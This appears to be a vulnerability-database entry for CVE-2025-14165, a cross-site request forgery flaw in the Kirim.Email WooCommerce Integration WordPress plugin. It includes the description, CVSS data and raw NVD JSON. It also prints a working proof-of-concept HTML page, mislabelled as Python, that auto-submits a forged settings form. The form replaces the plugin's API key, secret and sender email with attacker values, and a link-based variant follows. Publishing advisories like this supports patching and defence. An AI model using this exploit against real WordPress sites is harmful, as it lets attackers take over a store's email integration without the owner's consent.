Security Vulnerability Report
中文
CVE-2025-14165 CVSS 4.3 MEDIUM

CVE-2025-14165

Published: 2025-12-12 04:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Kirim.Email WooCommerce Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.9. This is due to missing nonce validation on the plugin's settings page. This makes it possible for unauthenticated attackers to modify the plugin's API credentials and integration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Kirim.Email WooCommerce Integration <= 1.2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14165 --> <!-- This PoC modifies Kirim.Email WooCommerce Integration settings --> <!DOCTYPE html> <html> <head> <title>CSRF Attack - CVE-2025-14165</title> </head> <body> <h1>CSRF PoC for CVE-2025-14165</h1> <p>Kirim.Email WooCommerce Integration < = 1.2.9</p> <form action="http://target-site/wp-admin/admin.php?page=kirimemail-woocommerce" method="POST" id="csrfForm"> <!-- Change API credentials to attacker-controlled values --> <input type="hidden" name="kirimemail_api_key" value="attacker_api_key"> <input type="hidden" name="kirimemail_api_secret" value="attacker_api_secret"> <input type="hidden" name="kirimemail_sender_email" value="[email protected]"> <input type="hidden" name="kirimemail_settings_nonce" value=""> <input type="hidden" name="kirimemail_save_settings" value="1"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this, the form was not auto-submitted.</p> <button onclick="document.getElementById('csrfForm').submit()">Submit</button> </body> </html> <!-- Alternative: Simple link-based PoC --> <!-- <a href="http://target-site/wp-admin/admin.php?page=kirimemail-woocommerce&kirimemail_api_key=attacker_key&kirimemail_save_settings=1">Click me</a> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14165", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:49.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kirim.Email WooCommerce Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.9. This is due to missing nonce validation on the plugin's settings page. This makes it possible for unauthenticated attackers to modify the plugin's API credentials and integration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/tags/1.2.9/includes/class-kirimemail-woocommerce.php#L113", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/tags/1.2.9/includes/class-kirimemail-woocommerce.php#L137", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/trunk/includes/class-kirimemail-woocommerce.php#L113", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/trunk/includes/class-kirimemail-woocommerce.php#L137", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/70993f6f-d9b0-49d5-b35e-e129f96529f6?source=cve", "source": "[email protected]"}]}}